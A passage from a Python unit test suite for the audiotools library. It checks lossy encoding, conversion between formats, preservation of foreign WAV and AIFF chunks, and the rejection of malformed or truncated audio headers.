            self.assertEqual(track.lossless(), False)
            track = audiotools.open(temp.name)
            self.assertEqual(track.lossless(), False)
        finally:
            temp.close()

    @FORMAT_LOSSY
    def test_channels(self):
        """Any input channel count must be normalized to 2 channels."""
        if (self.audio_class is audiotools.AudioFile):
            return
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for channels in [1, 2, 3, 4, 5, 6]:
                track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
                    1, channels=channels, channel_mask=0))
                self.assertEqual(track.channels(), 2)
                track = audiotools.open(temp.name)
                self.assertEqual(track.channels(), 2)
        finally:
            temp.close()

    @FORMAT_LOSSY
    def test_channel_mask(self):
        """A plain stereo channel mask must survive encoding intact."""
        if (self.audio_class is audiotools.AudioFile):
            return
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            cm = audiotools.ChannelMask.from_fields(
                front_left=True,
                front_right=True)
            track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
                1, channels=len(cm), channel_mask=int(cm)))
            self.assertEqual(track.channels(), len(cm))
            self.assertEqual(track.channel_mask(), cm)
            track = audiotools.open(temp.name)
            self.assertEqual(track.channels(), len(cm))
            self.assertEqual(track.channel_mask(), cm)
        finally:
            temp.close()

    @FORMAT_LOSSY
    def test_pcm(self):
        """Exercise from_pcm()/to_pcm() across compression modes.

        For each compression mode (plus the default), encodes silence,
        noise and variable-sized chunks of each, verifying the decoded
        stream length; also checks error propagation from failing
        PCMReaders and unwritable output paths.
        """
        if (self.audio_class is audiotools.AudioFile):
            return
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        temp2 = tempfile.NamedTemporaryFile()
        temp_dir = tempfile.mkdtemp()
        try:
            for compression in (None,) + self.audio_class.COMPRESSION_MODES:
                #test silence
                reader = BLANK_PCM_Reader(5)
                if (compression is None):
                    track = self.audio_class.from_pcm(temp.name, reader)
                else:
                    track = self.audio_class.from_pcm(temp.name, reader,
                                                      compression)
                # decoded stream must be 5 seconds of 2ch/16bps/44100Hz
                counter = FrameCounter(2, 16, 44100)
                audiotools.transfer_framelist_data(track.to_pcm(),
                                                   counter.update)
                self.assertEqual(int(counter), 5,
                                 "mismatch encoding %s at quality %s" % \
                                     (self.audio_class.NAME,
                                      compression))
                #test random noise
                reader = RANDOM_PCM_Reader(5)
                if (compression is None):
                    track = self.audio_class.from_pcm(temp.name, reader)
                else:
                    track = self.audio_class.from_pcm(temp.name, reader,
                                                      compression)
                counter = FrameCounter(2, 16, 44100)
                audiotools.transfer_framelist_data(track.to_pcm(),
                                                   counter.update)
                self.assertEqual(int(counter), 5,
                                 "mismatch encoding %s at quality %s" % \
                                     (self.audio_class.NAME,
                                      compression))
                #test randomly-sized chunks of silence
                reader = Variable_Reader(BLANK_PCM_Reader(5))
                if (compression is None):
                    track = self.audio_class.from_pcm(temp.name, reader)
                else:
                    track = self.audio_class.from_pcm(temp.name, reader,
                                                      compression)
                counter = FrameCounter(2, 16, 44100)
                audiotools.transfer_framelist_data(track.to_pcm(),
                                                   counter.update)
                self.assertEqual(int(counter), 5,
                                 "mismatch encoding %s at quality %s" % \
                                     (self.audio_class.NAME,
                                      compression))
                #test randomly-sized chunks of random noise
                reader = Variable_Reader(RANDOM_PCM_Reader(5))
                if (compression is None):
                    track = self.audio_class.from_pcm(temp.name, reader)
                else:
                    track = self.audio_class.from_pcm(temp.name, reader,
                                                      compression)
                counter = FrameCounter(2, 16, 44100)
                audiotools.transfer_framelist_data(track.to_pcm(),
                                                   counter.update)
                self.assertEqual(int(counter), 5,
                                 "mismatch encoding %s at quality %s" % \
                                     (self.audio_class.NAME,
                                      compression))
                #test PCMReaders that trigger a DecodingError
                self.assertRaises(ValueError,
                                  ERROR_PCM_Reader(ValueError("error"),
                                                   failure_chance=1.0).read,
                                  1)
                self.assertRaises(IOError,
                                  ERROR_PCM_Reader(IOError("error"),
                                                   failure_chance=1.0).read,
                                  1)
                # a failing reader must raise EncodingError and leave
                # no partially-written file behind
                self.assertRaises(audiotools.EncodingError,
                                  self.audio_class.from_pcm,
                                  os.path.join(temp_dir,
                                               "invalid" + self.suffix),
                                  ERROR_PCM_Reader(IOError("I/O Error")))
                self.assertEqual(os.path.isfile(
                    os.path.join(temp_dir,
                                 "invalid" + self.suffix)),
                    False)
                self.assertRaises(audiotools.EncodingError,
                                  self.audio_class.from_pcm,
                                  os.path.join(temp_dir,
                                               "invalid" + self.suffix),
                                  ERROR_PCM_Reader(IOError("I/O Error")))
                self.assertEqual(os.path.isfile(
                    os.path.join(temp_dir,
                                 "invalid" + self.suffix)),
                    False)
                #test unwritable output file
                self.assertRaises(audiotools.EncodingError,
                                  self.audio_class.from_pcm,
                                  "/dev/null/foo.%s" % (self.suffix),
                                  BLANK_PCM_Reader(1))
                #test without suffix
                reader = BLANK_PCM_Reader(5)
                if (compression is None):
                    track = self.audio_class.from_pcm(temp2.name, reader)
                else:
                    track = self.audio_class.from_pcm(temp2.name, reader,
                                                      compression)
                counter = FrameCounter(2, 16, 44100)
                audiotools.transfer_framelist_data(track.to_pcm(),
                                                   counter.update)
                self.assertEqual(int(counter), 5,
                                 "mismatch encoding %s at quality %s" % \
                                     (self.audio_class.NAME,
                                      compression))
        finally:
            temp.close()
            temp2.close()
            # remove any stray files created in the scratch directory
            for f in os.listdir(temp_dir):
                os.unlink(os.path.join(temp_dir, f))
            os.rmdir(temp_dir)

    @FORMAT_LOSSY
    def test_convert(self):
        """Verify convert() to every available type keeps stream length.

        Unlike the lossless variant, only the total decoded length
        (5 seconds) is checked, never exact PCM data.
        """
        if (self.audio_class is audiotools.AudioFile):
            return
        #check various round-trip options
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            # 220500 frames at 44100Hz = 5 seconds of stereo sine
            track = self.audio_class.from_pcm(
                temp.name,
                test_streams.Sine16_Stereo(220500, 44100,
                                           8820.0, 0.70, 4410.0, 0.29, 1.0))
            for audio_class in audiotools.AVAILABLE_TYPES:
                temp2 = tempfile.NamedTemporaryFile(
                    suffix="." + audio_class.SUFFIX)
                try:
                    track2 = track.convert(temp2.name,
                                           audio_class)
                    counter = FrameCounter(2, 16, 44100)
                    audiotools.transfer_framelist_data(track2.to_pcm(),
                                                       counter.update)
                    self.assertEqual(
                        int(counter), 5,
                        "mismatch encoding %s" % \
                            (self.audio_class.NAME))
                    # unwritable target path must raise EncodingError
                    self.assertRaises(audiotools.EncodingError,
                                      track.convert,
                                      "/dev/null/foo.%s" % \
                                          (audio_class.SUFFIX),
                                      audio_class)
                    # repeat at every supported quality level
                    for compression in audio_class.COMPRESSION_MODES:
                        track2 = track.convert(temp2.name,
                                               audio_class,
                                               compression)
                        counter = FrameCounter(2, 16, 44100)
                        audiotools.transfer_framelist_data(track2.to_pcm(),
                                                           counter.update)
                        self.assertEqual(
                            int(counter), 5,
                            "mismatch encoding %s at quality %s" % \
                                (self.audio_class.NAME,
                                 compression))
                        #check some obvious failures
                        self.assertRaises(audiotools.EncodingError,
                                          track.convert,
                                          "/dev/null/foo.%s" % \
                                              (audio_class.SUFFIX),
                                          audio_class,
                                          compression)
                finally:
                    temp2.close()
        finally:
            temp.close()
class TestForeignWaveChunks:
    """Mixin for WaveContainer formats which can carry foreign
    (non-fmt/data) RIFF WAVE chunks through encoding and conversion.

    Expects the concrete test case to provide self.audio_class.
    """

    @FORMAT_LOSSLESS
    def test_convert_wave_chunks(self):
        """Verify foreign RIFF chunks survive from_wave() and convert().

        Checks, in order:
        1) files built via from_pcm() report no foreign chunks
        2) files built via from_wave() with extra chunks report them
           and return the identical header/footer
        3) converting such files to every other WaveContainer type
           preserves chunks, header/footer and PCM data, and invokes
           the progress callback with monotonic values
        4) malformed wave headers/footers raise EncodingError and
           leave no output file behind
        """
        self.assert_(issubclass(self.audio_class,
                                audiotools.WaveContainer))

        # each entry is (wave header, stream parameters, wave footer);
        # headers are zlib-compressed to keep the source compact

        #several even-sized chunks
        chunks1 = (("x\x9c\x0b\xf2ts\xdbQ\xc9\xcb\x10\xee\x18" +
                    "\xe6\x9a\x96[\xa2 \xc0\xc0\xc0\xc0\xc8\xc0" +
                    "\xc4\xe0\xb2\x86\x81A`#\x13\x03\x0b\x83" +
                    "\x00CZ~~\x15\x07P\xbc$\xb5\xb8\xa4$\xb5" +
                    "\xa2$)\xb1\xa8\n\xa4\xae8?757\xbf(\x15!^U" +
                    "\x05\xd40\nF\xc1(\x18\xc1 %\xb1$1\xa0\x94" +
                    "\x97\x01\x00`\xb0\x18\xf7").decode('zlib'),
                   (220500, 44100, 2, 16, 0x3),
                   "spam\x0c\x00\x00\x00anotherchunk")

        #several odd-sized chunks
        chunks2 = (("x\x9c\x0b\xf2ts\xcbc``\x08w\x0csM\xcb\xcf\xaf" +
                    "\xe2b@\x06i\xb9%\n\x02@\x9a\x11\x08]\xd60" +
                    "\x801#\x03\x07CRbQ\x157H\x1c\x01\x18R\x12K\x12" +
                    "\xf9\x81b\x00\x19\xdd\x0ba").decode('zlib'),
                   (15, 44100, 1, 8, 0x4),
                   "\x00barz\x0b\x00\x00\x00\x01\x01\x01\x01" +
                   "\x01\x01\x01\x01\x01\x01\x01\x00")

        # 1) plain from_pcm() files must carry no foreign chunks
        for (header,
             (total_frames,
              sample_rate,
              channels,
              bits_per_sample,
              channel_mask), footer) in [chunks1, chunks2]:
            temp1 = tempfile.NamedTemporaryFile(
                suffix="." + self.audio_class.SUFFIX)
            try:
                #build our audio file from the from_pcm() interface
                track = self.audio_class.from_pcm(
                    temp1.name,
                    EXACT_RANDOM_PCM_Reader(
                        pcm_frames=total_frames,
                        sample_rate=sample_rate,
                        channels=channels,
                        bits_per_sample=bits_per_sample,
                        channel_mask=channel_mask))
                #check has_foreign_wave_chunks
                self.assertEqual(track.has_foreign_wave_chunks(), False)
            finally:
                temp1.close()

        # 2) + 3) from_wave() files carry the chunks through conversion
        for (header,
             (total_frames,
              sample_rate,
              channels,
              bits_per_sample,
              channel_mask), footer) in [chunks1, chunks2]:
            temp1 = tempfile.NamedTemporaryFile(
                suffix="." + self.audio_class.SUFFIX)
            try:
                #build our audio file using the from_wave() interface
                track = self.audio_class.from_wave(
                    temp1.name,
                    header,
                    EXACT_RANDOM_PCM_Reader(
                        pcm_frames=total_frames,
                        sample_rate=sample_rate,
                        channels=channels,
                        bits_per_sample=bits_per_sample,
                        channel_mask=channel_mask),
                    footer)

                #check has_foreign_wave_chunks
                self.assertEqual(track.has_foreign_wave_chunks(), True)

                #ensure wave_header_footer returns same header and footer
                (track_header,
                 track_footer) = track.wave_header_footer()
                self.assertEqual(header, track_header)
                self.assertEqual(footer, track_footer)

                #convert our file to every other WaveContainer format
                #(including our own)
                for new_class in audiotools.AVAILABLE_TYPES:
                    # BUGFIX: was isinstance(new_class, WaveContainer),
                    # which is always False for class objects and left
                    # this entire branch unexecuted; issubclass() is the
                    # intended test (as asserted at the top of this method)
                    if (issubclass(new_class, audiotools.WaveContainer)):
                        # BUGFIX: was the undefined name "wav_class"
                        temp2 = tempfile.NamedTemporaryFile(
                            suffix="." + new_class.SUFFIX)
                        log = Log()
                        try:
                            # BUGFIX: was convert(temp2, new_class,
                            # log.update) which passed a file object as
                            # the target path and the callback in the
                            # compression slot; pass the path and the
                            # progress callback explicitly
                            # NOTE(review): assumes convert() accepts a
                            # "progress" keyword — confirm against
                            # AudioFile.convert's signature
                            track2 = track.convert(temp2.name,
                                                   new_class,
                                                   progress=log.update)

                            #ensure the progress function
                            #gets called during conversion
                            self.assert_(
                                len(log.results) > 0,
                                "no logging converting %s to %s" %
                                (self.audio_class.NAME,
                                 new_class.NAME))
                            self.assert_(
                                len(set([r[1] for r in log.results])) == 1)
                            # progress values must never decrease
                            for x, y in zip(log.results[1:], log.results):
                                self.assert_((x[0] - y[0]) >= 0)

                            #ensure newly converted file
                            #matches has_foreign_wave_chunks
                            self.assertEqual(
                                track2.has_foreign_wave_chunks(), True)

                            #ensure newly converted file
                            #has same header and footer
                            (track2_header,
                             track2_footer) = track2.wave_header_footer()
                            self.assertEqual(header, track2_header)
                            self.assertEqual(footer, track2_footer)

                            #ensure newly converted file has same PCM data
                            self.assertEqual(
                                audiotools.pcm_frame_cmp(
                                    track.to_pcm(), track2.to_pcm()), None)
                        finally:
                            temp2.close()
            finally:
                temp1.close()

        # 4) malformed headers/footers must raise EncodingError
        #    and never leave an output file behind
        if (os.path.isfile("bad.wav")):
            os.unlink("bad.wav")

        for (header, footer) in [
            #wave header without "RIFF<size>WAVE raises an error
            ("", ""),
            ("FOOZ\x00\x00\x00\x00BARZ", ""),
            #invalid total size raises an error
            ("RIFFZ\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00" +
             "\x10\x00data2\x00\x00\x00", ""),
            #invalid data size raises an error
            ("RIFFV\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00" +
             "\x10\x00data6\x00\x00\x00", ""),
            #invalid chunk IDs in header raise an error
            ("RIFFb\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
             "chn\x00\x04\x00\x00\x00\x01\x02\x03\x04" +
             "data2\x00\x00\x00", ""),
            #mulitple fmt chunks raise an error
            ("RIFFn\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00" +
             "\x10\x00" +
             "fmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00" +
             "\x10\x00" +
             "data2\x00\x00\x00", ""),
            #data chunk before fmt chunk raises an error
            ("RIFFJ\x00\x00\x00WAVE" +
             "chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
             "data2\x00\x00\x00", ""),
            #bytes after data chunk raises an error
            ("RIFFb\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
             "chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
             "data3\x00\x00\x00\x01", ""),
            #truncated chunks in header raise an error
            ("RIFFb\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
             "chnk\x04\x00\x00\x00\x01\x02\x03", ""),
            #fmt chunk in footer raises an error
            ("RIFFz\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
             "chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
             "data2\x00\x00\x00",
             "fmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00"),
            #data chunk in footer raises an error
            ("RIFFn\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
             "chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
             "data2\x00\x00\x00",
             "data\x04\x00\x00\x00\x01\x02\x03\x04"),
            #invalid chunk IDs in footer raise an error
            ("RIFFn\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
             "chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
             "data2\x00\x00\x00",
             "chn\x00\x04\x00\x00\x00\x01\x02\x03\x04"),
            #truncated chunks in footer raise an error
            ("RIFFn\x00\x00\x00WAVEfmt \x10\x00\x00\x00\x01" +
             "\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00" +
             "chnk\x04\x00\x00\x00\x01\x02\x03\x04" +
             "data2\x00\x00\x00",
             "chnk\x04\x00\x00\x00\x01\x02\x03"),
                ]:
            self.assertRaises(audiotools.EncodingError,
                              self.audio_class.from_wave,
                              "bad.wav",
                              header,
                              EXACT_BLANK_PCM_Reader(25,
                                                     44100,
                                                     1,
                                                     16,
                                                     0x4),
                              footer)
            self.assertEqual(os.path.isfile("bad.wav"), False)
class TestForeignAiffChunks:
    """Mixin for AiffContainer formats which can carry foreign
    (non-COMM/SSND) AIFF chunks through encoding and conversion.

    Expects the concrete test case to provide self.audio_class.
    """

    @FORMAT_LOSSLESS
    def test_convert_aiff_chunks(self):
        """Verify foreign AIFF chunks survive from_aiff() and convert().

        Checks, in order:
        1) files built via from_pcm() report no foreign chunks
        2) files built via from_aiff() with extra chunks report them
           and return the identical header/footer
        3) converting such files to every other AiffContainer type
           preserves chunks, header/footer and PCM data, and invokes
           the progress callback with monotonic values
        4) malformed aiff headers/footers raise EncodingError and
           leave no output file behind
        """
        self.assert_(issubclass(self.audio_class,
                                audiotools.AiffContainer))

        # each entry is (aiff header, stream parameters, aiff footer);
        # headers are zlib-compressed to keep the source compact

        #several even-sized chunks
        chunks1 = (("x\x9cs\xf3\x0f\xf2e\xe0\xad<\xe4\xe8\xe9\xe6\xe6" +
                    "\xec\xef\xeb\xcb\xc0\xc0 \xc4\xc0\xc4\xc0\x1c\x1b" +
                    "\xc2 \xe0\xc0\xb7\xc6\x85\x01\x0c\xdc\xfc\xfd\xa3" +
                    "\x80\x14GIjqIIjE\x89\x93c\x10\x88/P\x9c\x9f\x9b" +
                    "\x9a\x9b_\x94\x8a\x10\x8f\x02\x8a\xb30\x8c" +
                    "\x82Q0\nF.\x08\x0e\xf6sa\xe0-\x8d\x80\xf1\x01" +
                    "\xcf\x8c\x17\x18").decode('zlib'),
                   (220500, 44100, 2, 16, 0x3),
                   "SPAM\x00\x00\x00\x0canotherchunk")

        #several odd-sized chunks
        chunks2 = (("x\x9cs\xf3\x0f\xf2e``\xa8p\xf4tss\xf3\xf7\x8f" +
                    "\x02\xb2\xb9\x18\xe0\xc0\xd9\xdf\x17$+\xc4\xc0" +
                    "\x08$\xf9\x198\x1c\xf8\xd6\xb8@d\x9c\x1c\x83@j" +
                    "\xb9\x19\x11\x80!8\xd8\x0f$+\x0e\xd3\r" +
                    "\x00\x16\xa5\t3").decode('zlib'),
                   (15, 44100, 1, 8, 0x4),
                   "\x00BAZZ\x00\x00\x00\x0b\x02\x02\x02\x02" +
                   "\x02\x02\x02\x02\x02\x02\x02\x00")

        # 1) plain from_pcm() files must carry no foreign chunks
        for (header,
             (total_frames,
              sample_rate,
              channels,
              bits_per_sample,
              channel_mask), footer) in [chunks1, chunks2]:
            temp1 = tempfile.NamedTemporaryFile(
                suffix="." + self.audio_class.SUFFIX)
            try:
                #build our audio file from the from_pcm() interface
                track = self.audio_class.from_pcm(
                    temp1.name,
                    EXACT_RANDOM_PCM_Reader(
                        pcm_frames=total_frames,
                        sample_rate=sample_rate,
                        channels=channels,
                        bits_per_sample=bits_per_sample,
                        channel_mask=channel_mask))
                #check has_foreign_aiff_chunks()
                self.assertEqual(track.has_foreign_aiff_chunks(), False)
            finally:
                temp1.close()

        # 2) + 3) from_aiff() files carry the chunks through conversion
        for (header,
             (total_frames,
              sample_rate,
              channels,
              bits_per_sample,
              channel_mask), footer) in [chunks1, chunks2]:
            temp1 = tempfile.NamedTemporaryFile(
                suffix="." + self.audio_class.SUFFIX)
            try:
                #build our audio file using from_aiff() interface
                track = self.audio_class.from_aiff(
                    temp1.name,
                    header,
                    EXACT_RANDOM_PCM_Reader(
                        pcm_frames=total_frames,
                        sample_rate=sample_rate,
                        channels=channels,
                        bits_per_sample=bits_per_sample,
                        channel_mask=channel_mask),
                    footer)

                #check has_foreign_aiff_chunks()
                self.assertEqual(track.has_foreign_aiff_chunks(), True)

                #ensure aiff_header_footer returns same header and footer
                (track_header,
                 track_footer) = track.aiff_header_footer()
                self.assertEqual(header, track_header)
                self.assertEqual(footer, track_footer)

                #convert our file to every other AiffContainer format
                #(including our own)
                for new_class in audiotools.AVAILABLE_TYPES:
                    # BUGFIX: was isinstance(new_class, AiffContainer),
                    # which is always False for class objects and left
                    # this entire branch unexecuted; issubclass() is the
                    # intended test (as asserted at the top of this method)
                    if (issubclass(new_class, audiotools.AiffContainer)):
                        # BUGFIX: was the undefined name "wav_class"
                        temp2 = tempfile.NamedTemporaryFile(
                            suffix="." + new_class.SUFFIX)
                        log = Log()
                        try:
                            # BUGFIX: was convert(temp2, new_class,
                            # log.update) which passed a file object as
                            # the target path and the callback in the
                            # compression slot; pass the path and the
                            # progress callback explicitly
                            # NOTE(review): assumes convert() accepts a
                            # "progress" keyword — confirm against
                            # AudioFile.convert's signature
                            track2 = track.convert(temp2.name,
                                                   new_class,
                                                   progress=log.update)

                            #ensure the progress function
                            #gets called during conversion
                            self.assert_(
                                len(log.results) > 0,
                                "no logging converting %s to %s" %
                                (self.audio_class.NAME,
                                 new_class.NAME))
                            self.assert_(
                                len(set([r[1] for r in log.results])) == 1)
                            # progress values must never decrease
                            for x, y in zip(log.results[1:], log.results):
                                self.assert_((x[0] - y[0]) >= 0)

                            #ensure newly converted file
                            #matches has_foreign_aiff_chunks
                            self.assertEqual(
                                track2.has_foreign_aiff_chunks(), True)

                            #ensure newly converted file
                            #has same header and footer
                            (track2_header,
                             track2_footer) = track2.aiff_header_footer()
                            self.assertEqual(header, track2_header)
                            self.assertEqual(footer, track2_footer)

                            #ensure newly converted file has same PCM data
                            self.assertEqual(
                                audiotools.pcm_frame_cmp(
                                    track.to_pcm(), track2.to_pcm()), None)
                        finally:
                            temp2.close()
            finally:
                temp1.close()

        # 4) malformed headers/footers must raise EncodingError
        #    and never leave an output file behind
        if (os.path.isfile("bad.aiff")):
            os.unlink("bad.aiff")

        for (header, footer) in [
            #aiff header without "FORM<size>AIFF raises an error
            ("", ""),
            ("FOOZ\x00\x00\x00\x00BARZ", ""),
            #invalid total size raises an error
            ("FORM\x00\x00\x00tAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #invalid SSND size raises an error
            ("FORM\x00\x00\x00rAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #invalid chunk IDs in header raise an error
            ("FORM\x00\x00\x00~AIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "CHN\x00\x00\x00\x00\x04\x01\x02\x03\x04" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #mulitple COMM chunks raise an error
            ("FORM\x00\x00\x00\x8cAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #SSND chunk before COMM chunk raises an error
            ("FORM\x00\x00\x00XAIFF" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #bytes missing from SSNK chunk raises an error
            ("FORM\x00\x00\x00rAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00<\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #bytes after SSND chunk raises an error
            ("FORM\x00\x00\x00rAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #truncated chunks in header raise an error
            ("FORM\x00\x00\x00rAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #COMM chunk in footer raises an error
            ("FORM\x00\x00\x00\x8cAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #SSND chunk in footer raises an error
            ("FORM\x00\x00\x00rAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00"),
            #invalid chunk IDs in footer raise an error
            ("FORM\x00\x00\x00rAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3\00\x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00\x00"),
            #truncated chunks in footer raise an error
            ("FORM\x00\x00\x00rAIFF" +
             "COMM\x00\x00\x00\x12\x00\x01\x00\x00\x00\x19\x00" +
             "\x10@\x0e\xacD\x00\x00\x00\x00\x00\x00" +
             "SSND\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x00",
             "ID3 \x00\x00\x00\nID3\x02\x00\x00\x00\x00\x00"),
                ]:
            self.assertRaises(audiotools.EncodingError,
                              self.audio_class.from_aiff,
                              "bad.aiff",
                              header,
                              EXACT_BLANK_PCM_Reader(25,
                                                     44100,
                                                     1,
                                                     16,
                                                     0x4),
                              footer)
            self.assertEqual(os.path.isfile("bad.aiff"), False)
class AiffFileTest(TestForeignAiffChunks, LosslessFileTest):
    """Test case for the AIFF audio format.

    Inherits the lossless round-trip tests plus the foreign
    AIFF-chunk preservation tests.
    """

    def setUp(self):
        # format under test and its file suffix
        self.audio_class = audiotools.AiffAudio
        self.suffix = "." + self.audio_class.SUFFIX

    @FORMAT_AIFF
    def test_ieee_extended(self):
        """Round-trip integer sample rates through 80-bit IEEE extended.

        Builds every value from 0 to 192000 as an IEEE extended float
        and verifies parse_ieee_extended() recovers it exactly.
        """
        from audiotools.bitstream import BitstreamReader, BitstreamRecorder
        import audiotools.aiff
        for i in xrange(0, 192000 + 1):
            w = BitstreamRecorder(0)
            audiotools.aiff.build_ieee_extended(w, float(i))
            s = cStringIO.StringIO(w.data())
            self.assertEqual(w.data(), s.getvalue())
            self.assertEqual(i, audiotools.aiff.parse_ieee_extended(
                BitstreamReader(s, 0)))

    @FORMAT_AIFF
    def test_verify(self):
        """Verify invalid AIFF files are detected.

        Covers truncated COMM/SSND chunks, non-ASCII chunk IDs,
        missing SSND chunks, convert() on truncated input, and
        invalid chunk orderings built via aiff_from_chunks().
        """
        import audiotools.aiff
        #test truncated file
        for aiff_file in ["aiff-8bit.aiff",
                          "aiff-1ch.aiff",
                          "aiff-2ch.aiff",
                          "aiff-6ch.aiff"]:
            f = open(aiff_file, 'rb')
            aiff_data = f.read()
            f.close()
            temp = tempfile.NamedTemporaryFile(suffix=".aiff")
            try:
                #first, check that a truncated comm chunk raises an exception
                #at init-time
                # 0x25 = first byte past the COMM chunk in these fixtures
                for i in xrange(0, 0x25):
                    temp.seek(0, 0)
                    temp.write(aiff_data[0:i])
                    temp.flush()
                    self.assertEqual(os.path.getsize(temp.name), i)
                    self.assertRaises(audiotools.InvalidFile,
                                      audiotools.AiffAudio,
                                      temp.name)
                #then, check that a truncated ssnd chunk raises an exception
                #at read-time
                # 0x37 = first byte inside the SSND data in these fixtures
                for i in xrange(0x37, len(aiff_data)):
                    temp.seek(0, 0)
                    temp.write(aiff_data[0:i])
                    temp.flush()
                    reader = audiotools.AiffAudio(temp.name).to_pcm()
                    self.assertNotEqual(reader, None)
                    self.assertRaises(IOError,
                                      audiotools.transfer_framelist_data,
                                      reader, lambda x: x)
            finally:
                temp.close()
        #test non-ASCII chunk ID
        temp = tempfile.NamedTemporaryFile(suffix=".aiff")
        try:
            f = open("aiff-metadata.aiff")
            aiff_data = list(f.read())
            f.close()
            # 0x89 is presumably inside a chunk ID in this fixture —
            # overwriting it with NUL makes the ID non-ASCII
            aiff_data[0x89] = chr(0)
            temp.seek(0, 0)
